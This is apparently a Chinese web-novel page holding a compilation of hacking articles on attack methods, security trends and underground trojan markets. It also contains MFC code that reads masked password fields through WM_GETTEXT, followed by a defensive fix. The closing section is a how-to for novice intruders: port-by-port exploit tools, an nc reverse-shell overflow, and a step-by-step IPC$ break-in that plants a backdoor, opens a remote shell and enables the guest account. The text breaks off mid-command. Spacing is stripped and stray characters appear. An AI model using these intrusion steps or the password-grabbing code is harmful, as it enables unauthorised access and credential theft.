|
|||||||||||||||||||
|
黑客邪医 | ||||
作者:豆泥九,更新时间:2008-3-20 3:02:00,完成字数:424399 |
||||
|
|
||||
1全面分析黑客常用九种攻击方法 许多上网的用户对安全可能抱着无所谓的态度,认为最多不过是被“黑客”盗用账号,他们往往会认为“安全”只是针对那些大中型企事业单位的,而且黑客与自己无怨无仇,干嘛要攻击自己呢?其实,在一无法纪二无制度的虚拟世界中,现实生活中所有的阴险和卑鄙都表现得一览无余,在这样的信息时代里,几乎每个人都面临着安全威胁,都有必要对安全有所了解,并能够处理一些安全方面的问题,那些平时不注意安全的人,往往在受到安全方面的攻击时,付出惨重的代价时才会后悔不已。同志们要记住啊!防人之心不可无呀! 为了把损失降低到最低限度,我们一定要有安全观念,并掌握一定的安全防范措施,禁绝让黑客无任何机会可趁。下面我们就来研究一下那些黑客是如何找到你计算机中的安全漏洞的,只有了解了他们的攻击手段,我们才能采取准确的对策对付这些黑客。 1、获取口令 这又有三种方法:一是通过监听非法得到用户口令,这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;二是在知道用户的账号后(如电子邮件@前面的部分)利用一些专门软件强行破解用户口令,这种方法不受网段限制,但黑客要有足够的耐心和时间;三是在获得一个服务器上的用户口令文件(此文件成为shadow文件)后,用暴力破解程序破解用户口令,该方法的使用前提是黑客获得口令的shadow文件。此方法在所有方法中危害最大,因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器,而是在本地将加密后的口令与shadow文件中的口令相比较就能非常容易地破获用户密码,尤其对那些弱智用户(指口令安全系数极低的用户,如某用户账号为zys,其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内,甚至几十秒内就可以将其干掉。 2、放置特洛伊木马程序 特洛伊木马程序可以直接侵入用户的电脑并进行破坏,它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载,一旦用户打开了这些邮件的附件或者执行了这些程序之后,它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中,并在自己的计算机系统中隐藏一个可以在windows启动时悄悄执行的程序。当您连接到因特网上时,这个程序就会通知黑客,来报告您的ip地址以及预先设定的端口。黑客在收到这些信息后,再利用这个潜伏在其中的程序,就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等,从而达到控制你的计算机的目的。 3、www的欺骗技术 在网上用户可以利用ie等浏览器进行各种各样的web站点的访问,如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在:正在访问的网页已经被黑客篡改过,网页上的信息是虚假的!例如黑客将用户要浏览的网页的url改写为指向黑客自己的服务器,当用户浏览目标网页的时候,实际上是向黑客服务器发出请求,那么黑客就可以达到欺骗的目的了。 4、电子邮件攻击 电子邮件攻击主要表现为两种方式:一是电子邮件轰炸和电子邮件“滚雪球”,也就是通常所说的邮件炸弹,指的是用伪造的ip地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件,致使受害人邮箱被“炸”,严重者可能会给电子邮件服务器操作系统带来危险,甚至瘫痪;二是电子邮件欺骗,攻击者佯称自己为系统管理员(邮件地址和系统管理员完全相同),给用户发送邮件要求用户修改口令(口令可能为指定字符串)或在貌似正常的附件中加载病毒或其他木马程序(据笔者所知,某些单位的管理员有定期给用户免费发送防火墙升级程序的义务,这为黑客成功地利用该方法提供了可乘之机),这类欺骗只要用户提高警惕,一般危害性不是太大。 5、通过一个节点来攻击其他节点 黑客在突破一台主机后,往往以此主机作为根据地,攻击其他主机(以隐蔽其入侵路径,避免留下蛛丝马迹)。他们可以使用监听方法,尝试攻破同一内的其他主机;也可以通过ip欺骗和主机信任关系,攻击其他主机。这类攻击很狡猾,但由于某些技术很难掌握,如ip欺骗,因此较少被黑客使用。 6、监听 监听是主机的一种工作模式,在这种模式下,主机可以接受到本网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接受方是谁。此时,如果两台主机进行通信的信息没有加密,只要使用某些监听工具,例如netxrayforwindows95/98/nt,sniffitforlinux、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然监听获得的用户帐号和口令具有一定的局限性,但监听者往往能够获得其所在网段的所有用户帐号及口令。 7、寻找系统漏洞 许多系统都有这样那样的安全漏洞(bugs),其中某些是操作系统或应用软件本身具有的,如sendmail漏洞,win98中的共享目录密码验证漏洞和ie5漏洞等,这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏,除非你将网线拔掉;还有一些漏洞是由于系统管理员配置错误引起的,如在文件系统中,将目录和文件以可写的方式调出,将未加shadow的用户密码文件以明码方式存放在某一目录下,这都会给黑客带来可乘之机,应及时加以修正。 8、利用帐号进行攻击 有的黑客会利用操作系统提供的缺省账户和密码进行攻击,例如许多unix主机都有ftp和guest等缺省账户(其密码和账户名同名),有的甚至没有口令。黑客用unix操作系统提供的命令如finger和ruser等收集信息,不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕,将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。 9、偷取特权 利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击,前者可使黑客非法获得对用户机器的完全控制权,后者可使黑客获得超级用户的权限,从而拥有对整个的绝对控制权。这种攻击手段,一旦奏效,危害性极大。 2黑客入侵攻击四种最新趋势 从1988年开始,位于美国卡内基梅隆大学的CERTCC(计算机紧急响应小组协调中心)就开始调查入侵者的活动。CERTCC给出一些关于最新入侵者攻击方式的趋势。 趋势一:攻击过程的自动化与攻击工具的快速更新 攻击工具的自动化程度继续不断增强。自动化攻击涉及到的四个阶段都发生了变化。 1.扫描潜在的受害者。从1997年起开始出现大量的扫描活动。目前,新的扫描工具利用更先进的扫描技术,变得更加有威力,并且提高了速度。 2.入侵具有漏洞的系统。以前,对具有漏洞的系统的攻击是发生在大范围的扫描之后的。现在,攻击工具已经将对漏洞的入侵设计成为扫描活动的一部分,这样大大加快了入侵的速度。 3.攻击扩散。2000年之前,攻击工具需要一个人来发起其余的攻击过程。现在,攻击工具能够自动发起新的攻击过程。例如红色代码和Nimda病毒这些工具就在18个小时之内传遍了全球。 4.攻击工具的协同管理。自从1999年起,随着分布式攻击工具的产生,攻击者能够对大量分布在Internet之上的攻击工具发起攻击。现在,攻击者能够更加有效地发起一个分布式拒绝服务攻击。协同功能利用了大量大众化的协议如IRC(InternetRelayChat)、IR(InstantMessage)等的功能。 趋势二:攻击工具的不断复杂化 攻击工具的编写者采用了比以前更加先进的技术。攻击工具的特征码越来越难以通过分析来发现,并且越来越难以通过基于特征码的检测系统发现,例如防病毒软件和入侵检测系统。当今攻击工具的三个重要特点是反检测功能,动态行为特点以及攻击工具的模块化。 1.反检测。攻击者采用了能够隐藏攻击工具的技术。这使得安全专家想要通过各种分析方法来判断新的攻击的过程变得更加困难和耗时。 2.动态行为。以前的攻击工具按照预定的单一步骤发起进攻。现在的自动攻击工具能够按照不同的方法更改它们的特征,如随机选择、预定的决策路径或者通过入侵者直接的控制。 3.攻击工具的模块化。和以前攻击工具仅仅实现一种攻击相比,新的攻击工具能够通过升级或者对部分模块的替换完成快速更改。而且,攻击工具能够在越来越多的平台上运行。例如,许多攻击工具采用了标准的协议如IRC和HTTP进行数据和命令的传输,这样,想要从正常的流量中分析出攻击特征就更加困难了。 趋势三:漏洞发现得更快 每一年报告给CERT/CC的漏洞数量都成倍增长。CERT/CC公布的漏洞数据2000年为1090个,2001年为2437个,2002年已经增加至4129个,就是说每天都有十几个新的漏洞被发现。可以想象,对于管理员来说想要跟上补丁的步伐是很困难的。而且,入侵者往往能够在软件厂商修补这些漏洞之前首先发现这些漏洞。随着发现漏洞的工具的自动化趋势,留给用户打补丁的时间越来越短。尤其是缓冲区溢出类型的漏洞,其危害性非常大而又无处不在,是计算机安全的最大的威胁。在CERT和其它国际性安全机构的调查中,这种类型的漏洞是对服务器造成后果最严重的。 趋势四:渗透防火墙 我们常常依赖防火墙提供一个安全的主要边界保护。但是情况是: *已经存在一些绕过典型防火墙配置的技术,如IPP(theInternetPrintingProtocol)和WebDAV(Web-basedDistributedAuthoringandVersioning) *一些标榜是“防火墙适用”的协议实际上设计为能够绕过典型防火墙的配置。 特定特征的“移动代码”(如ActiveX控件,Java和JavaScript)使得保护存在漏洞的系统以及发现恶意的软件更加困难。 另外,随着Internet上计算机的不断增长,所有计算机之间存在很强的依存性。一旦某些计算机遭到了入侵,它就有可能成为入侵者的栖息地和跳板,作为进一步攻击的工具。对于基础架构如DNS系统、路由器的攻击也越来越成为严重的安全威胁。 采用主动防御措施应对新一代攻击 “红色代码”蠕虫病毒在因特网上传播的最初九小时内就感染了超过250,000个计算机系统。该感染导致的代价以每天2亿美元飞速增长,最终损失高达26亿美元。“红色代码”,“红色代码II”,及“尼姆达”、“求职信”快速传播的威胁显示出现有的防御的严重的局限性。市场上大多数的入侵检测系统是简单的,对中新出现的、未知的、通常称做“瞬时攻击:Zero-dayAttack”的威胁没有足够防御手段。 黑客的“机会之窗” 目前大多数的入侵检测系统是有局限性的,因为它们使用特征码去进行辨别是否存在攻击行为。这些系统采用这种方式对特定的攻击模式进行监视。它们基于贮存在其数据库里的识别信息:类似于防病毒软件检查已知病毒的方式。这意味着这些系统只能检测他们已经编入识别程序的特定的攻击。因为“瞬时攻击”是新出现的,尚未被广泛认识,所以在新的特征码被开发出来,并且进行安装和配置等这些过程之前,它们就能绕过这些安全系统。实际上,仅仅需要对已知的攻击方式进行稍微的修改,这些系统就不会认识这些攻击方式了,从而给入侵者提供了避开基于特征码的防御系统的手段。 从新的攻击的发动到开发新的特征码的这段时间,是一个危险的“机会之窗”,许多的会被攻破。这时候许多快速的入侵工具会被设计开发出来,很容易受到攻击。下图举例说明了为什么大多数的安全产品在该时期内实际上是无效的。CERT组织研制的这个图表说明了一个攻击的典型的生命周期。该曲线的波峰就在攻击的首次袭击之后,这是大多数安全产品最终开始提供保护的时候。然而“瞬时攻击”是那些最老练的黑客在最早期阶段重点展开的。 同时,现在那些快速进行的攻击利用了广泛使用的计算机软件中的安全漏洞来造成分布更广的破坏。仅仅使用几行代码,他们就能编写一个蠕虫渗透到计算机中,通过共享账号克隆自己,然后开始攻击你的同伴和用户的。使用这种方式,在厂商开发出特征码并将其分发到用户的这段时间内,“尼姆达蠕虫”仅仅在美国就传播到了超过100,000的站点。这些分发机制使“瞬间攻击”像SirCam和LoveBug两种病毒分别席卷了230万和4000万的计算机,而不需要多少人为干预。其中有些攻击甚至还通过安装一个后门来为以后的破坏建立基础,该后门允许对手、黑客和其他未获授权的用户访问一个组织重要的数据和资源。 3黑客游戏潜规则 “QQ木马求挂(无后门绝对免杀),按信封收费180元/W,进1W结算一次或每日0点至凌晨1点结算。结算方式:即时支付宝或工行转帐。联系QQ:XXXXX(请注明带挂QQ木马马)……收肉鸡了,收流量了,出售QQ号……” 看到这些信息你的表情也许可以用惊愕来形容,但对于另一些人来说,对这些信息已经习以为常了,因为这些信息经常会在一些技术群,安全站点上的论坛中出现。随着信息化社会的发展,各种各样的需求也在层出不穷的涌现。一些有技术的“黑客”们都在考虑如何让手中的那些代码转变成money,在他们眼中,也许能证明自己存在的价值早已蜕变成“这段代码到底能换多少张人民币”了,过去我们经常说“一切向前看”,如今都变成了一切向“钱”看了。 潜规则一:马披龙袍装麒麟,不变的是本质从灰鸽子说黑客技术演进 2003年初,互联网诞生了一个名为灰鸽子的工作室,开发出一套名为“远程控制系统”的软件,当时经过笔者的一些分析后,觉得还是把它定义为木马比较恰当。在后来,特别是今年,也验证了笔者当时的定论。“灰鸽子远程控制管理系统”只是木马的一个“马甲”而已。提到木马就不得不说一下著名的“冰河”(作者:黄鑫),它是早期的木马软件之一,操作简单方便,基于c/s(客户端/服务器端)模式开发。说到操作简单,你只需要在入侵后的主机上安装一个server.exe,在操作的主机安装client.exe就可以了。正是因为它容易上手,所以被更多的“黑客”们利用。如今的灰鸽子也是基于这样的技术架构开发出来的,但是它确实也有很多的改进,有自己独特的东西在里面,现在的灰鸽子可以被简单定位为反弹型后门木马。 作者开发这个软件目的也许是想更加方便的管理远程主机,服务器等,又或许是想*”远程控制软件“这个华丽的外表,赚取了更多的money。但无论出于什么样的目的,这款软件随着编写技术的提升,和产品的不断改进,逐渐出现了能逃避杀毒软件的版本。笔者曾经拿到这样的版本,在经过技术分析之后,得出以下结论:新版本的改进主要体现在加壳技术上,在原灰鸽子的基础上加层保护壳,使杀毒软件库中的病毒特征码无法与之匹配,从而达到躲避杀毒软件围剿的目的。目前,它的最新版本仍然可以轻松躲过瑞星、卡巴斯基、nod32等知名杀毒软件。 此规则点评:一场没有结局的猫鼠游戏,安全厂家不断的招募民间黑客提升自身产品实力,从而促使地下黑客技术不断完善,用于躲避追杀。说实话,谁都不容易。 潜规则二:我出力,你付钱这是理所当然利益驱使黑客变质 杀毒软件的原理主要是*特征码比对技术,根据用户提交或者其他渠道捕获到的病毒样本制定出相应的病毒库,而病毒库中并没有真正的病毒源代码,只是病毒特征码。灰鸽子经过不屑的努力,终于飞进了千家万户,在非常多的主机和服务器上“落户”,给国家和个人的计算机系统造成了严重影响,一些“黑客”通过灰鸽子将个人用的生活照,夫妻照片等个人隐私泄露到中,而把政府机关和企业的一些机密信息拿来和businessspy(商业间谍)做现金交易。总的来说这些都是利益驱使,更多的“黑客”会认为这是他的劳动所得,是*双手和脑力劳动换取过来的,符合一分耕耘,一份收获的逻辑推理。 此规则点评:千古不变的至理名言——有钱能使鬼推磨。付出当然就要有实实在在的收获,谁说我做的不对,那准是在嫉妒,我是黑客我怕谁。 潜规则三:一山不容二虎两个和尚没水喝 2004年圈子出了更火暴的事情,因为入侵某官方站点的游戏数据库而获的不菲的利润,后因在分钱问题上,意见不和,用经济术语来讲就是不能达到利益共同点,最后两人在京城大打出手,双方都有一些损失由此演出了一场真人pk。后来两个主角还觉得不够过瘾,最后直接在著名的圈中论坛安全焦点上进行了长达100多页以上的对骂。更多圈子里面的人发表的看法是狗咬狗一嘴毛!入侵数据库虽说是赚钱,但是这钱来是见不得光的。当然,你是辛苦了,努力了,但是这是通过非法手段入侵得到的,从法律上说这就是违法的事,说起这两个人也是圈子中的名人,由于身在圈中的关系,两位主角的名字就不方便透漏了。 此规则点评:黑客讲究协同作战,默契的配合永远都很重要,但在利益面前,团结的力量很容易疲软。这也是当今社会的普遍存在的潜规则。 潜规则四:黑客眼里没有拿不下的山头 越来越多的“黑客”都在*“技术”吃饭,有些黑客拿下游戏数据库,通过提权后弄到整个服务器的控制权,刷装备,换金币来完成一些游戏装备交易;还有一些人甚至拿下境外的高利贷,赌博站点,在获得个人信息后,联系犯罪组织,狂刷受害人的信用卡,疯狂的购物;还有人利用技术制造出虚假银行站点,通过phishing(钓鱼)手段获取那些使用网上银行用户的真实信息,使用keybordloger(键盘记录器)或木马来捕获对方录入信息,从而拿到受害人个人信息,银行帐号的卡号及密码记录。 此规则点评:只要被黑客盯上,如果没有强大的反黑力量支持,那你可以直接准备后事了。就算是有反黑的实力,毕竟明枪易躲,暗箭难防。 综上所述:各行各业都有道,有规则,黑客界里也一样,有人说黑客更多的给人的感觉是上收费的保安,保镖,安全公司呢就是镖局。互联网就是个虚拟的江湖,但是黑客是真实存在的,他们在里面充当着黑与白的角色,有的是充当杀手(破坏者cracker),有的是充当保镖(hacker),这就是黑客圈中的潜规则。江湖中,黑色交易每天都在幕后进行着,潜规则也将继续存在……。 未来的安全是不容忽视的,笔者在这里提醒广大的计算机用户:在熟练使用电脑的同时,要先学会保护自己,提高自身的安全知识和认识,这样至少可以避免一些不幸的发生。最后奉劝那些只想着赚钱的黑客兄弟们一句话:常在江湖混,早晚要还的,还是多做一些善事吧! 4未来安全十大趋势 Counterpane安全公司的技术长官BruceSchneier列举了影响当今信息安全的十种趋势。 趋势一信息将比以往更有价值 例如,Amazon.com公司通过信息运用在线购买图书系统,大幅提高了工作效率。同样,互联网零售商Pets.com破产时,Schneier介绍,公司的客户数据库成了“他们拥有的资产唯一价值”。 信息在控制接入方面同样具有价值,例如,签署契约,用户鉴定,同时对于法律执行中的追踪罪犯,搜集证据等方面也很有价值。 趋势二成为关键的基础设施 成为关键的基础设施,但这并不是设计的初衷,“它就是这样发生了”,Schneier说。 互联网的发展趋势尚未能够阻挡重要系统步入。互联网使公司大幅提高了工作效率,使人们之间的交流与沟通变得更加便捷畅快,但同时也给经济方面带来风险。Schneier坦言:“如果互联网全部或部分瘫痪,势必给经济带来不良影响。” 趋势三用户不必管理个人信息 比如,互联网服务供给商记录用户在网站的浏览历史,收发的信息;同样,电话接线员的服务器上也会保留一份用户的号码簿。Schneier称:“你的私人信息都很有价值,但却不能保证信息的安全性,即便是对于高度私人化的信息也是如此。” 趋势四黑客逐渐变成犯罪的职业 黑客袭击不再是一种个人兴趣,而是越来越多地变为一种有组织的、利益驱使的职业犯罪。Schneier认为:“由于对手正在改变,黑客袭击的性质也随之而变。” 拒绝服务相关的敲诈勒索与“钓鱼”就是黑客袭击的两个例子。此外,黑客还会利用黑市穿透共同的IT系统。 趋势五复杂性成为最大敌人 Schneier认为“系统越复杂,面临的安全危险就越大”,并称互联网为“有史以来最复杂的机器”。安全技术的发展始终未能跟上互联网前进的步伐。“安全形势好转,可同时系统却变得更加复杂。” 趋势六黑客袭击要比漏洞补丁来得更快 新的漏洞出现要比设备制造商修补的速度更快。在其他方面,一些嵌入式系统中出现的漏洞,比如思科系统公司的路由器,不能被修补,导致许多公司成为被攻击的对象。 趋势七蠕虫较以往更为高级 它们已经包含漏洞测评工具,正在扫描全体漏洞的防御系统,并正把Google公司作为信息搜集工具。“这种趋势导致越来越多的蠕虫犯罪。” 趋势八对端成为最弱连接点 Schneier认为:“如果远程计算机不可信赖,不管你的认证方案有多棒都无济于事。”在很多情况下,不在公司保护范围内的电脑是最弱的连接。这些电脑经常感染蠕虫和间谍软件,为黑客袭击提供机会。 趋势九安全软件可能威胁终端 各大公司不断地发展软件来防御终端用户,如DRM(数字版权保护)软件。Schneier指出,“我们看到越来越多的安全防护非但不能够保护用户,反而被用作侵袭用户的工具。”在至少一种情况下,包括索尼公司安装的DRM软件,如果没有用户的许可,软件都会对终端用户造成伤害。“围绕这一问题的有关标准和规则将成为一个大战场。”Schneier说,并预言这是一场关于保护用户和侵袭用户的软件之间的争斗。 趋势十法规将推动安全检查 详细描述公司该如何处理数据的法规并不少见。类似《萨班-奥西利法案》(Sarbanes-OxleyAct)的法规将成为公司安全检查背后的驱动力。 5黑客探取密码原理与防范措施 Edit控件是Windows的一个标准控件,当把其Password属性设为True时,就会将输入的内容屏蔽为星号,从而达到保护的目的。虽然我们看来都是星号,但程序中的Edit控件实际仍是用户输入的密码,应用程序可以获取该控件中的密码,其他应用程序也可以通过向其发送WM_GETTEXT或EM_GETLINE消息来获取Edit控件中的内容。黑客程序正是利用Edit控件的这个特性,当发现当前探测的窗口是Edit控件并且具有ES_PASSWORD属性时,则通过SendMessage向此窗口发送WM_GETTEXT或EM_GETLINE消息,这样Edit框中的内容就一目了然了。 二、黑客软件工作方法: 首先要取得当前的窗口,并判断是否是Edit控件,一般多通过鼠标来指定要探测的窗口,例如在WM_MOUSEMOVE消息的响应函数中进行判断,现列举代码片段如下: //将客户坐标转换成屏幕坐标 ClientToScreen(&point); //返回一个包含指定屏幕坐标点的窗口 CWnd*pWnd=CWnd::WindowFromPoint(point); if(pWnd) { //获取窗口句柄 HWNDhwndCurr=pWnd->GetSafeHwnd(); if((::GetWindowThreadProcessId(GetSafeHwnd(),NULL))!=(::GetWindowThreadProcessId(hwndCurr,NULL))) { charlpClassName[255]; //获取类名 if(::GetClassName(hwndCurr,lpClassName,255)) { //判断是否是Edit控件 if(0==m_strWndClass.CompareNoCase(‘EDIT‘)) { //获取窗口风格 LONGlStyle=::GetWindowLong(hwndCurr,GWL_STYLE); //如果设置了ES_PASSWORD属性 if(lStyle&ES_PASSWORD) { charszText[255]; //通过掌握的句柄hwndCurr向此控件发送WM_GETTEXT消息 ::SendMessage(hwndCurr,WM_GETTEXT,255,(LPARAM)szText);//密码已保存在szText中 m_strPassword=szText; } } } } 上述代码中值得注意的有以下几个关键地方: ClientToScreen(&point); CWnd*pWnd=CWnd::WindowFromPoint(point); HWNDhwndCurr=pWnd->GetSafeHwnd(); 这三句代码可以获取当前鼠标位置所在窗口的窗口句柄,在SendMessage中要用到的。 ::SendMessage(hwndCurr,WM_GETTEXT,255,(LPARAM)szText); 这便是真正起作用的SendMessage了,其第一个参数指定了要接收消息的窗口句柄,我们已经通过上面的代码获取到了,第二个参数就是让Edit控件返回字符的WM_GETTEXT消息了,并将得到的内容保存在szText中。 三、防范措施 既然我们搞清除了黑客软件普遍采取的手法,那我们自然能制订出一套防范其攻击的措施来。下面我们就要对Password进行保护。 从以上分析我们可以看出:Edit控件的漏洞主要在于没有对发送WM_GETTEXT或EM_GETLINE消息者的身份进行检查,只要能找到Edit窗口句柄,任何进程都可获取其内容。所以必须要对发送消息者的身份进行验证,这里给出一种方法来验证发送消息者的身份是否合法: 1.创建新CEdit类 从CEdit继承一个子类CPasswordEdit,申明全局变量g_bSenderIdentity表明消息发送者的身份: BOOLg_bSenderIdentity;oufxpwx|O 然后响应CWnd的虚函数DefWindowProc,在这个回调函数中进行身份验证: LRESULTCPasswordEdit::DefWindowProc(UINTmessage,WPARAMwParam,LPARAMlParam) { //对Edit的内容获取必须通过以下两个消息之一 if((message==WM_GETTEXT)||(message==EM_GETLINE)) { //检查是否为合法 if(!g_bSenderIdentity) { //非法获取,显示信息 AfxMessageBox(_T(‘报告:正在试图窃取密码!‘)); return0; } //合法获取 g_bSenderIdentity=FALSE; } returnCEdit::DefWindowProc(message,wParam,lParam); } 2.在数据输入对话框中做些处理 在对话框中申明一个类成员m_edtPassword: CpasswordEditm_edtPassword; 然后在对话框的OnInitDialog()中加入下列代码: m_edtPassword.SubclassDlgItem(IDC_EDIT_PASSWORD,this); 将控制与新类做关联。 之后要在对话框的数据交换函数中将身份设为合法: voidCDlgInput::DoDataExchange(CDataExchange*pDX) { //如果获取数据 //注意:对于CPropertyPage类这里不需要if(pDX->m_bSaveAndValidate)条件 if(pDX->m_bSaveAndValidate) { g_bSenderIdentity=TRUE; } CDialog::DoDataExchange(pDX); //{{AFX_DATA_MAP(CDlgInput) DDX_Text(pDX,IDC_EDIT_PASSWORD,m_sPassword); //}}AFX_DATA_MAP } 这样,Password输入框就拥有了合法身份,会受到保护。 结论: 以上的方法仅针对VC程序,对于其他语言如VB、Delphi等语言,需要借助VC做一个Password的ActiveX控件,实现方法与上述方法基本类似。以上程序均用VisualC++6.0编制调试通过。 6各国黑客部队大扫描 近一段时间,西方大报小报都在恶炒所谓中国黑客事件,但是对自己的黑客部队却都闭口不谈。实际上,对于高度依赖信息化、化装备的西方国家而言,大都建有十分专业的“黑客部队”。不仅如此,一些被认为极度落后的国家也拥有自己的“网军”,这些黑客技术先进,手段多样,让人防不胜防。 西方都有黑客部队 要说“黑客部队”规模最大,建立最早的首推美国。2005年,美军就已组建专门负责作战的“战联合功能构成司令部”,而且美陆海空军和战略司令部都有“网军”,部队作为一种全新的部队样式,已被正式纳入美军的作战序列。美国在欧洲的“小兄弟”英国也是积极效仿。据报道,英国军情六处早在2001年就秘密组建了一支有数百名计算机精英组成的黑客部队。该部队的选材标准可谓是不拘一格,甚至一些有过前科的民间黑客也被收编。除了欧美大国外,信息技术十分先进的日本也非常重视黑客部队的建设。日本防卫省目前已经组建了一支由军中计算机专家组成的约5000人的战部队,专门从事系统的攻防。该部队的主要任务是,进行反黑客、反病毒入侵的攻击,同时研制开发可破坏其他国家系统的跨国性“武器”,必要时可对敌方重要实施“瘫痪战”。 除了发达国家积极建设部队外,一些发展中国家也是趋之若鹜,试图在新一轮较量中获取“非对称”优势。目前印军组建了联合计算机应急分队,并将一些民间“黑客”和编程高手“招安”。此外,印军也在位于新德里的陆军总部建立了安全部门,他们还将在所有军区和重要军事部门的总部建立安全分部。除此之外,俄罗斯、以色列等国也都十分重视“黑客部队”,不过对更多的国家而言,身兼黑客重任的则是一些所谓负责安全的专职人员,因为他们深谙“黑客”技巧,懂得安全的命门在哪里。 技术先进手段多样 黑客往往利用的漏洞实施攻击,其惯用的攻击手段主要包括“后门程序”、“炸弹攻击”、“僵尸”等等。当一个训练有素的程序员设计一个功能较复杂的软件时,都习惯于先将整个软件分割为若干模块,然后再对各模块单独设计、调试,而后门则是一个模块的秘密入口。在软件研制完成后,部分后门仍然没有被“关掉”,那么,后门就可能被黑客用特殊软件和工具搜索发现并利用。通过后门,黑客可以在对方毫无察觉的情况下侵入计算机,窃取有价值的情报。而“炸弹攻击”的基本原理是利用特殊工具软件,在短时间内向目标机集中发送大量超出系统接收范围的信息或者垃圾信息,目的在于使对方目标机出现超负荷、堵塞等状况,从而造成目标的系统崩溃及拒绝服务。而“僵尸”是指黑客通过特洛伊木马等病毒集中控制一群计算机,用来对其他、服务器或者计算机发起大规模的攻击,同时黑客控制的这些计算机所保存的信息也都可被黑客随意“取用”。 此外,一些黑客还经常使用“广泛撒网”的战术,对付那些从物理上同互联网隔开的军用和计算机。他们将一些木马病毒散布到特定的中,如果敌军方的移动存储设备不幸中毒,那么一旦该存储设备被接入军内计算机或,木马病毒就开始疯狂复制、下载秘密信息,并将其隐藏在移动存储设备中。一旦此移动存储器被再次接到链接互联网的计算机上,那么这些机密信息就会通过互联网自动转发到黑客部队的手中。据称,前段时间发生的日本“宙斯盾”资料泄密事件中,存储“宙斯盾”机密信息的硬盘链接到互联网后,就是首先被日本监察人员发现了蛛丝马迹。 防御黑客软硬兼施 为了防止黑客攻击给己方和计算机带来损失,各国军方从硬件和软件两方面双管齐下抵御黑客攻击。硬件防火墙是必不可少的。防火墙是设置在不同之间的一系列部件的组合。通过监测、限制、更改跨越防火墙的信息,尽可能地对外部屏蔽内部的信息,有选择地接受外部访问,在被保护和外部之间架起一道屏障,以防止发生不可预测的破坏性入侵。 除了硬件防火墙以外,一些防御、监控软件也是必不可少的,这些软件除了可以抵御部分攻击外,还能监控的异常。当然,最好的防御就是进攻,大多数国家的“黑客部队”身兼双重任务,瘫痪对方的攻击,堵死对方的攻击路径才是最好的选择。不过,任何军队都不能打包票自己的不会被入侵,所以绝大多数国家部队都规定高等级机密信息不得存储在上网计算机上 7各个端口的入侵方法 希望对新手入侵有帮助! 1.1433端口入侵 scanport.exe查有1433的机器 SQLScanPass.exe进行字典暴破(字典是关键) 最后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello溢出漏洞入侵。 nc-vv-l-p本机端口sqlhelloF.exe入侵ip1433本机ip本机端口 (以上反向的,测试成功) sqlhelloz.exe入侵ip1433(这个是正向连接) 2.4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3.3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4.80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件)。 5.serv-u入侵(21端口) 对5.004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 6.554端口 用real554.exe入侵。 7.6129端口 用DameWare6129.exe入侵。 8.系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。 9.3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10.其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 经典IPC$入侵 1.C:\>netuse$‘>\\127.0.0.1\IPC$‘‘/user:‘admintitrators‘ 这是用‘流光‘扫到的用户名是administrators,密码为‘空‘的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为‘空‘,所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。 2.C:\>copysrv.exe$‘>\\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 3.C:\>nettimefile://127.0.0.1/ 查查时间,发现127.0.0.1的当前时间是2002/3/19上午11:00,命令成功完成。 4.C:\>atfile://127.0.0.1/11:05srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊. 5.C:\>nettimefile://127.0.0.1/ 再查查到时间没有?如果127.0.0.1的当前时间是2002/3/19上午11:05,那就准备开始下面的命令。 6.C:\>telnet127.0.0.199 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 7.C:\>copyntlm.exe$‘>\\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8.C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现‘DONE‘的时候,就说明已经启动正常。然后使用‘netstarttelnet‘来开启Telnet服务! 9.Telnet127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组 10.C:\>netuserguest/active:yes 将对方的Guest用户激活 11.C:\>netuserguest1234 